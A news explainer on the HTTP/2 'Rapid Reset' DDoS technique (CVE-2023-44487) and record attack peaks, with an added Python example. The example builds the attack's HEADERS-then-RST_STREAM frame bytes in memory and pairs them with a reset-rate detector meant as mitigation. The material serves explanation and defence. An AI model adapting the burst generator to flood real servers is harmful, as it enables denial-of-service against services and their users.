Google mitigated the largest DDoS attack in history so far

DDoS attacks

A DDoS (distributed denial of service) attack floods a computer system or network until a service or resource becomes inaccessible to legitimate users.

A few days ago the news broke that Google had recorded the largest DDoS attack ever seen against its infrastructure, peaking at 398 million RPS (requests per second). The attacks exploited a previously unknown vulnerability (CVE-2023-44487) in the HTTP/2 protocol that lets a client push an enormous stream of requests at a server at minimal cost to itself.

The new attack technique, dubbed "Rapid Reset", takes advantage of the fact that HTTP/2 multiplexing lets a client issue a continuous flow of requests inside an already established connection, without opening new network connections and without waiting for the server to acknowledge anything.

The vulnerability is considered a consequence of a weakness in the HTTP/2 protocol itself: the specification says that when a client tries to open too many streams, only the streams that exceed the limit should be rejected, not the entire connection.

Since the client side of the attack consists of nothing more than sending requests without ever reading the responses, it can be carried out with minimal resources. For example, the 201 million RPS attack recorded by Cloudflare was launched from a relatively small botnet of about 20,000 machines.

On the server side, the cost of handling each incoming request is far higher, even though it is cancelled, because the server still has to allocate the data structures for the new stream, parse the request, decompress the headers (HPACK) and route the URL to a resource. When the target is a reverse proxy, the load can propagate to the backend servers, since the proxy may already have forwarded the request upstream by the time it processes the RST_STREAM frame.

The attack only works against vulnerable servers that support HTTP/2 (scripts to check whether a server is affected and proof-of-concept attack tools have been published). No attacks against HTTP/3 have been observed so far, and the possibility has not been fully analysed, but Google's engineers recommend that server developers add protections to HTTP/3 implementations similar to those deployed to block the HTTP/2 attacks.

Like earlier HTTP/2 attack methods, the new attack opens a large number of streams within a single connection. The key difference is that instead of waiting for a response, the client follows each request immediately with an RST_STREAM frame, which cancels the request on the spot.

Cancelling each request early gets rid of the response traffic flowing back to the client and sidesteps the server's limit on the number of streams that may be open concurrently within one HTTP/2 connection (SETTINGS_MAX_CONCURRENT_STREAMS), because a cancelled stream no longer counts against that limit. As a result, the rate of requests hitting the HTTP server no longer depends on the round-trip time (RTT) between sending a request and receiving its response; it is bounded only by the bandwidth of the channel to the server.
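To make the mechanism concrete, here is an added example in Python (not code from Google, Cloudflare or the article's source, and not a usable attack tool). It builds the exact frame sequence described above, a complete HEADERS frame immediately followed by RST_STREAM on the same stream, entirely in memory with no network I/O, and then feeds those frames through a per-connection guard of the kind servers added as mitigation: count cancelled streams and cut the connection once the cancelled fraction becomes abusive. The host, path, thresholds and the "honest client" traffic pattern are assumptions made for the example; the HPACK encoding is deliberately minimal.

```python
"""HTTP/2 Rapid Reset (CVE-2023-44487): the frame sequence and a reset-rate guard.

Constructed example, not code from Google, Cloudflare or any HTTP/2 implementation.
No network I/O: the attacker's frames are built as bytes and fed straight into a
small frame parser plus a per-connection detector of the kind servers added as
mitigation.
"""
import struct

# Frame types, flags and error codes from the HTTP/2 specification (RFC 9113).
HEADERS = 0x01
RST_STREAM = 0x03
FLAG_END_STREAM = 0x01
FLAG_END_HEADERS = 0x04
ERR_CANCEL = 0x08


def frame(ftype: int, flags: int, stream_id: int, payload: bytes) -> bytes:
    """Prepend the 9-byte frame header: 24-bit length, type, flags, 31-bit stream id."""
    assert len(payload) < (1 << 24) and stream_id < (1 << 31)
    return (struct.pack("!I", len(payload))[1:] + bytes([ftype, flags])
            + struct.pack("!I", stream_id) + payload)


def hpack_get_request(authority: str, path: str) -> bytes:
    """Minimal HPACK block for 'GET <path>': static-table entries ':method GET'
    (index 2 -> 0x82) and ':scheme https' (index 7 -> 0x87), then ':path' and
    ':authority' as 'literal without indexing, indexed name' (first byte 0x0N,
    N = static index) with raw, non-Huffman values. Host and path are caller-supplied."""
    def literal(name_index: int, value: str) -> bytes:
        v = value.encode()
        assert len(v) < 127            # length must fit one 7-bit-prefix byte
        return bytes([name_index, len(v)]) + v
    return bytes([0x82, 0x87]) + literal(0x04, path) + literal(0x01, authority)


def rapid_reset_burst(authority: str, path: str, n_streams: int) -> bytes:
    """What the attacker sends: per stream, a complete request (HEADERS with
    END_HEADERS|END_STREAM) followed at once by RST_STREAM(CANCEL). No response is
    ever read, so the concurrent-stream limit is never reached."""
    block = hpack_get_request(authority, path)
    out, sid = bytearray(), 1          # client-initiated stream ids are odd, increasing
    for _ in range(n_streams):
        out += frame(HEADERS, FLAG_END_HEADERS | FLAG_END_STREAM, sid, block)
        out += frame(RST_STREAM, 0, sid, struct.pack("!I", ERR_CANCEL))
        sid += 2
    return bytes(out)


def benign_burst(authority: str, path: str, n_streams: int, cancel_every: int = 20) -> bytes:
    """Assumed honest-but-busy client: many requests, an occasional cancellation
    (user navigated away). Flow control is ignored for brevity."""
    block = hpack_get_request(authority, path)
    out, sid = bytearray(), 1
    for i in range(n_streams):
        out += frame(HEADERS, FLAG_END_HEADERS | FLAG_END_STREAM, sid, block)
        if (i + 1) % cancel_every == 0:
            out += frame(RST_STREAM, 0, sid, struct.pack("!I", ERR_CANCEL))
        sid += 2
    return bytes(out)


def bytes_per_request(authority: str, path: str) -> int:
    """Client-side wire cost of one cancelled request (HEADERS + RST_STREAM)."""
    return len(rapid_reset_burst(authority, path, 1))


def iter_frames(data: bytes):
    """Split a byte string into (type, flags, stream_id, payload) tuples."""
    off = 0
    while off < len(data):
        if off + 9 > len(data):
            raise ValueError("truncated frame header")
        length = int.from_bytes(data[off:off + 3], "big")
        ftype, flags = data[off + 3], data[off + 4]
        sid = struct.unpack("!I", data[off + 5:off + 9])[0] & 0x7FFFFFFF
        payload = data[off + 9:off + 9 + length]
        if len(payload) != length:
            raise ValueError("truncated frame payload")
        yield ftype, flags, sid, payload
        off += 9 + length


class ResetGuard:
    """Per-connection mitigation. SETTINGS_MAX_CONCURRENT_STREAMS does not help,
    because a reset stream frees its slot immediately, so count resets instead:
    once at least `max_resets` cancellations have been seen and they exceed
    `max_ratio` of the streams the client opened, the connection is closed
    (a real server would send GOAWAY). Streams are only removed here on reset;
    a server would also remove them when the response completes."""

    def __init__(self, max_resets: int = 100, max_ratio: float = 0.5):
        self.max_resets, self.max_ratio = max_resets, max_ratio
        self.opened = self.resets = 0
        self.live = set()

    def observe(self, ftype: int, flags: int, sid: int, payload: bytes) -> bool:
        """Return True while the connection may stay open, False once it must go."""
        if ftype == HEADERS and sid not in self.live:
            self.opened += 1
            self.live.add(sid)
        elif ftype == RST_STREAM and sid in self.live:
            self.live.discard(sid)
            self.resets += 1
        abusive = (self.resets >= self.max_resets
                   and self.resets / max(self.opened, 1) > self.max_ratio)
        return not abusive


def connection_survives(data: bytes, **guard_kwargs) -> bool:
    """Feed one client's frames through the guard; False means it would be cut off."""
    guard = ResetGuard(**guard_kwargs)
    return all(guard.observe(*f) for f in iter_frames(data))
```

For the assumed host and path, each cancelled request costs the client 40 bytes on the wire, which is why a modest botnet can reach hundreds of millions of RPS, while the honest client above is never cut off. A production guard would additionally evaluate the counters over time windows and respond with GOAWAY rather than simply flagging the connection.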

The most recent wave of attacks began in late August and continues today. It targets major infrastructure providers, including Google services, Google Cloud infrastructure, and their customers.

Although these attacks were among the largest Google has ever seen, its global load-balancing and DDoS mitigation infrastructure allowed its services to keep running.

To protect Google, its customers, and the rest of the Internet, Google helped lead a coordinated effort with industry partners to understand the mechanics of the attack and collaborate on mitigation measures that can be deployed in response to it.

In addition to Google, Amazon and Cloudflare also faced attacks with peaks of 155 and 201 million RPS respectively. The new attacks far exceed the previous record-breaking DDoS attack, in which attackers managed to generate 46 million requests per second. For comparison, all traffic on the entire Web is estimated at between 1 and 3 billion requests per second.

Finally, if you are interested in learning more about it, you can consult the details at the following link.

